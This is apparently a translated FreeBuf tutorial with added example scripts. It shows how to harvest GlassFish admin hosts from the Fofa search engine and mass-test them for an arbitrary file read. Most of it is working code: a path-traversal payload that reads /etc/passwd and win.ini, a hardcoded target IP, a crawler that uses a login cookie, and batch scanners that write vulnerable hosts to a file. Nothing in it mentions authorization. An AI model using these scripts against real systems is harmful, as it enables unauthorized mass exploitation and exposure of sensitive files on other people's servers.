Python Development: Batch Fofa & POC Verification – Author: 掌控安全一Wudu

Learning objective: learn to write scripts that take a public or 0day vulnerability and collect and verify targets in bulk.

We start from a basic vulnerability: an arbitrary file read in the GlassFish application server.


The vulnerability is titled "arbitrary file read", but it can also list the files in a directory, so in practice it amounts to source-code disclosure: all kinds of sensitive information are exposed.

On a Linux server we read the contents of /etc/passwd.

On a Windows server we read the contents of windows/win.ini.

Port 4848 is the web administration console port that GlassFish opens by default.

First, run a search on Fofa:

"glassfish" && port="4848" && after="2021-01-01" && country="CN"


The goal is to scrape these IP addresses and then verify each one with a POC.

First, a simple POC verification script:

#encoding:utf-8
import requests

url='http://112.126.97.184:4848/'
# %c0%ae is an overlong UTF-8 encoding of "."; ten "../" hops climb out of the web root
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

# one request per payload; .text holds the response body, .status_code the HTTP status
data_linux=requests.get(url.rstrip('/')+payload_linux,timeout=10)
data_windows=requests.get(url.rstrip('/')+payload_windows,timeout=10)

if data_linux.status_code==200 or data_windows.status_code==200:
    print("vulnerable")
else:
    print("not vulnerable")

The next question is how to do this in bulk:

1. Get the addresses that may be vulnerable, using Fofa to find targets.

2. Filter the data that the request returns.

When searching for "glassfish" && port="4848" && after="2021-01-01" && country="CN",

the URL of the first Fofa results page is

https://fofa.so/result?qbase64=ImdsYXNzZmlzaCImJnBvcnQ9IjQ4NDgiICYmIGFmdGVyPSIyMDIxLTAxLTAxIiAmJiBjb3VudHJ5PSJDTiI%3D

The value after ?qbase64= is a base64 string;

decoding it gives back the search query.

So the search query has to be base64-encoded before it goes into the URL:

import base64
import requests

url='https://fofa.so/result?qbase64='
search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
# base64-encode the UTF-8 bytes of the query and turn the result back into a str
search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
urls=url+search_data_bs
result=requests.get(urls,timeout=10).content
print(result.decode('utf-8'))

What comes back is the source of the whole page.

Next we filter out the key values; looking at the page source, the target is the value in the red box.

This needs the lxml library.


Extraction rule (XPath): //div[@class="re-domain"]//a[@target="_blank"]/@href

# -*- coding:UTF-8 -*-

import requests
import base64
from lxml import etree

url='https://fofa.so/result?qbase64='
search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
urls=url+search_data_bs
result=requests.get(urls,timeout=10).content
soup = etree.HTML(result)
# every href of an <a target="_blank"> inside a <div class="re-domain">
ip_data=soup.xpath('//div[@class="re-domain"]//a[@target="_blank"]/@href')
ipdata='\n'.join(ip_data)
print(ipdata)

This prints one page of IP addresses.


Next, scrape several pages of IPs and save them to a txt file.

Fofa only serves the second page onwards to a logged-in user, so the session cookie has to be copied out of the browser and sent with each request.

After filling out the code:

#encoding:utf-8
import requests
import base64
import time
import sys
from lxml import etree

def fofa_search(search_data,page):
    #search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
    # pages after the first need a logged-in session: paste the browser cookie here
    headers={
        'cookie':'',
    }
    # the query is the same on every page, so encode it once
    search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
    for yeshu in range(1,page+1):
        urls='https://fofa.so/result?page='+str(yeshu)+'&qbase64='+search_data_bs
        print('fetching page '+str(yeshu))
        try:
            result=requests.get(urls,headers=headers,timeout=10).content
            #print(result.decode('utf-8'))
            soup = etree.HTML(result)
            ip_data=soup.xpath('//div[@class="re-domain"]//a[@target="_blank"]/@href')
            ipdata='\n'.join(ip_data)
            with open(r'ip.txt','a+') as f:   # 'with' closes the file; no f.close() needed
                f.write(ipdata+'\n')
            print(ip_data)
            time.sleep(0.5)
        except Exception as e:
            # report instead of silently swallowing, so a bad cookie or a block is visible
            print('page '+str(yeshu)+' failed: '+str(e))

if __name__ == '__main__':
    # usage: python fofa_search.py '<fofa query>' <number of pages>
    search=sys.argv[1]
    page=sys.argv[2]
    fofa_search(search,int(page))
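As an added example that is not part of the original post, the following script pulls the three Fofa steps above (base64-encoding the query into qbase64, selecting the hrefs under div.re-domain / a[target=_blank], and walking page=N with a login cookie) into standalone functions that can be run and tested offline. It uses only the standard library, so html.parser stands in for the post's lxml XPath. The fetch callable, the cookie handling, the rule that an empty results page ends the crawl, and the sample HTML below (constructed to mimic the layout the post's XPath selects) are all assumptions of this example, not something the post states.

```python
"""Added example (not the original post's code): Fofa result URL builder,
result-link extractor and paginated crawler, stdlib only.

Assumptions (not from the post): the fetch(url, headers) callable, the
sample HTML pages used for the offline demo, and that a results page with
no links marks the end of the search.
"""
import base64
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from typing import Callable, Dict, Iterator, List

FOFA_RESULT = "https://fofa.so/result"
QUERY = '"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'


def qbase64(query: str) -> str:
    """Fofa's qbase64 parameter is the raw query, UTF-8, standard base64."""
    return base64.b64encode(query.encode("utf-8")).decode("ascii")


def fofa_result_url(query: str, page: int = 1) -> str:
    """Build https://fofa.so/result?page=N&qbase64=...; urlencode turns '=' into %3D."""
    return FOFA_RESULT + "?" + urllib.parse.urlencode({"page": page, "qbase64": qbase64(query)})


class ReDomainLinks(HTMLParser):
    """Equivalent of //div[@class="re-domain"]//a[@target="_blank"]/@href."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []
        self._divs: List[bool] = []  # one entry per open <div>: True if it is div.re-domain

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            self._divs.append("re-domain" in (a.get("class") or "").split())
        elif tag == "a" and any(self._divs) and a.get("target") == "_blank" and a.get("href"):
            self.hrefs.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "div" and self._divs:
            self._divs.pop()


def extract_hosts(html: str) -> List[str]:
    parser = ReDomainLinks()
    parser.feed(html)
    return parser.hrefs


def normalize(href: str) -> str:
    """Result links may be bare host:port; give them a scheme so an HTTP client accepts them."""
    return href if "://" in href else "http://" + href


def urllib_fetch(url: str, headers: Dict[str, str]) -> str:
    """Live fetch (assumed helper). Pass the browser's Fofa cookie via headers['Cookie']."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0", **headers})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def crawl(query: str, pages: int, fetch: Callable[[str, Dict[str, str]], str] = urllib_fetch,
          cookie: str = "") -> Iterator[str]:
    """Yield unique, normalized hosts from pages 1..pages, stopping at the first empty page."""
    headers = {"Cookie": cookie} if cookie else {}
    seen = set()
    for page in range(1, pages + 1):
        hosts = [normalize(h) for h in extract_hosts(fetch(fofa_result_url(query, page), headers))]
        if not hosts:
            break
        for host in hosts:
            if host not in seen:
                seen.add(host)
                yield host


# ---- constructed sample pages for the offline demo (not real Fofa output) ----
SAMPLE_PAGES = {
    1: '<div class="re-domain"><a target="_blank" href="http://10.0.0.1:4848">10.0.0.1:4848</a>'
       '<a target="_blank" href="10.0.0.2:4848">10.0.0.2:4848</a></div>'
       '<div class="other"><a target="_blank" href="http://ads.example/">ad</a></div>',
    2: '<div class="re-domain"><a target="_blank" href="http://10.0.0.1:4848">dup</a>'
       '<a target="_blank" href="https://10.0.0.3:4848">x</a></div>',
    3: "<div class='re-domain'></div>",
}


def fake_fetch(url: str, headers: Dict[str, str]) -> str:
    page = int(urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["page"][0])
    return SAMPLE_PAGES.get(page, "")


if __name__ == "__main__":
    for host in crawl(QUERY, 5, fake_fetch):
        print(host)
```

To run it against the real site, call `crawl(QUERY, pages, cookie="<your Fofa cookie>")` and write the yielded hosts to ip.txt; the deduplication matters because the same host can appear on two pages when results shift between requests.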
 

Then extend the earlier POC code to read addresses from ip.txt and write the vulnerable IPs into ck_vuln.txt:

import requests

payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

for ip in open('ip.txt'):
    ip=ip.strip()
    if not ip:          # skip the blank lines the crawler leaves between pages
        continue
    windows_url=ip+payload_windows
    linux_url=ip+payload_linux
    try:
        vuln_linux=requests.get(linux_url,timeout=10).status_code  # HTTP status of each probe
        vuln_windows=requests.get(windows_url,timeout=10).status_code
        print("check->"+ip)
        if vuln_linux==200 or vuln_windows==200:
            with open(r'ck_vuln.txt', 'a+') as f:
                f.write(ip + '\n')
    except Exception as e:
        print("error->"+ip+": "+str(e))
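Both the single-target POC and the batch loop above decide "vulnerable" on an HTTP 200 alone, which misfires on servers that answer 200 with an error page. The following added example, written for this page and not part of the original post, rebuilds the same traversal payload (the `%c0%ae` sequence is the overlong UTF-8 encoding of `.`, which is how the path gets past normalisation) and only reports a host when the response body actually looks like /etc/passwd or win.ini. The fetch callable, the content markers, the sample host list and the fake responses are assumptions made for this example so it runs offline.

```python
"""Added example (not the original post's code): GlassFish traversal check
that confirms file contents instead of trusting HTTP 200, plus a batch
runner over a host list like the post's ip.txt loop.

Assumptions (not from the post): the fetch callable signature, the marker
regexes used to recognise /etc/passwd and win.ini, and the constructed
host list / fake responses used for the offline demo.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Iterable, Iterator, Optional, Tuple

DOT = "%c0%ae"          # overlong UTF-8 encoding of "." (0xC0 0xAE)
TRAVERSAL_DEPTH = 10    # the post's payload climbs ten directories

TARGETS = {
    # os label -> (path under the filesystem root, regex the leaked body must match)
    "linux": ("etc/passwd", re.compile(r"^root:[^:]*:0:0:", re.M)),
    "windows": ("windows/win.ini", re.compile(r"(?i)\[(fonts|extensions|mci extensions)\]")),
}


def build_payload(target_file: str, depth: int = TRAVERSAL_DEPTH) -> str:
    """Rebuild the post's traversal path for an arbitrary file under the root."""
    return "/theme/META-INF/" + (DOT + DOT + "/") * depth + target_file.lstrip("/")


def looks_leaked(os_name: str, status: int, body: str) -> bool:
    """A hit needs 200 *and* a body that matches the expected file."""
    if status != 200:
        return False
    return TARGETS[os_name][1].search(body) is not None


def default_fetch(url: str) -> Tuple[int, str]:
    """Live fetch with urllib (stdlib). HTTP errors return their status instead of raising."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=8) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def check_host(base_url: str, fetch: Callable[[str], Tuple[int, str]] = default_fetch) -> Optional[str]:
    """Return 'linux' or 'windows' when a file read is confirmed, None otherwise.
    Timeouts and refused connections count as 'not confirmed'."""
    base_url = base_url.rstrip("/")
    for os_name, (path, _) in TARGETS.items():
        try:
            status, body = fetch(base_url + build_payload(path))
        except (OSError, ValueError):
            continue
        if looks_leaked(os_name, status, body):
            return os_name
    return None


def scan(hosts: Iterable[str], fetch=default_fetch) -> Iterator[Tuple[str, str]]:
    """Batch mode: yield (host, os) for each confirmed host, like the post's ck_vuln.txt loop."""
    for host in hosts:
        host = host.strip()
        if not host:
            continue
        if "://" not in host:  # Fofa hrefs may be bare host:port
            host = "http://" + host
        hit = check_host(host, fetch)
        if hit:
            yield host, hit


# ---- constructed offline demo: a fake fetch standing in for three hosts ----
FAKE_RESPONSES = {
    "http://10.0.0.1:4848" + build_payload("etc/passwd"): (200, "root:x:0:0:root:/root:/bin/bash\n"),
    "http://10.0.0.2:4848" + build_payload("etc/passwd"): (200, "<html>Not Found</html>"),  # 200, no leak
    "http://10.0.0.2:4848" + build_payload("windows/win.ini"): (200, "; for 16-bit app support\n[fonts]\n"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    for host, os_name in scan(["10.0.0.1:4848", "10.0.0.2:4848", "10.0.0.3:4848"], fake_fetch):
        print(host, "->", os_name)
```

Against real targets, call `scan(open("ip.txt"))` with the default fetch; the second demo host shows the case the status-code check gets wrong, a 200 whose body is not the requested file.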

Anyone want to chip in on a Fofa membership?

Source: freebuf.com 2021-03-02 16:14:30 by: 掌控安全一Wudu
